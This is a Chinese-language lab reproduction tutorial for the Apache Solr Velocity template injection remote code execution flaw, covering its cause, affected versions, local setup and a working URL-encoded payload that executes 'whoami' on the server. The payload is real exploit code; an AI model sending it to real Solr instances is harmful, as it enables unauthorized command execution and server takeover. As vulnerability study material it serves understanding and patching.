Apache Solr Velocity模板注入RCE漏洞复现

Apache Solr Velocity模板注入RCE漏洞复现

1、Apache Solr介绍

Solr是一个独立的企业级搜索应用服务器,它对外提供相似于web-service的API接口,用户能够经过http请求,向搜索引擎服务器提交必定格式的XML文件,生成索引,也能够经过http get操做提出查找请求,并获得XML格式的返回结果。

2、漏洞描述

Solr中存在VelocityResponseWriter组件,攻击者能够构造特定请求修改相关配置,使VelocityResponseWriter组件容许加载指定模板,进而致使Velocity模版注入远程命令执行漏洞，攻击者利用该漏洞能够直接获取到服务器权限。

漏洞产生缘由:

当攻击者能够直接访问Solr控制台时，能够经过发送相似/节点名/config的POST请求对该节点的配置文件作更改Apache Solr默认集成VelocityResponseWriter插件，在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否容许参数资源加载器在Solr请求参数中指定模板，默认设置是false。当设置params.resource.loader.enabled为ture时，将容许用户经过设置请求中的参数来指定相关资源加载，这也就意味着攻击者能够经过构造一个具备威胁的攻击请求，在服务器上进行命令执行。

3、漏洞影响版本

Apache Solr 5.x - 8.2.0，存在config API版本

4、漏洞环境搭建

一、 安装java环境

　　

二、下载Apache Solr 8.2.0,下载地址: https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip

三、解压而后进入bin目录执行solr.cmd start

　　

四、浏览器访问192.168.10.171:8983，环境搭建成功

　　

5、漏洞复现

一、从新启动,再次访问192.168.10.171:8983/solr发现没有建立core, 先手动在/server/solr/目录下建立一个test的文件夹，而后将/server/solr/configsets/_default/下的conf目录拷贝到test目录下

　　

 

 　　

二、而后按照以下图所示建立一个名为test的core

　　

三、而后访问查看该应用config文件是否能够访问

　　

四、Apache Solr默认集成VelocityResponseWriter插件，该插件初始化参数中的params.resource.loader.enabled默认值设置为false，可是能够经过POST请求直接修改集合设置，将其设置为true，而后就能够构造特殊的GET请求来实现远程代码执行。

　　

五、接下来咱们就能够构造payload来实现RCE

Payload以下:

/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

　　

 

 

 

 

-----------------------------------------------------------------------------------------------------

参考:

POC地址: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template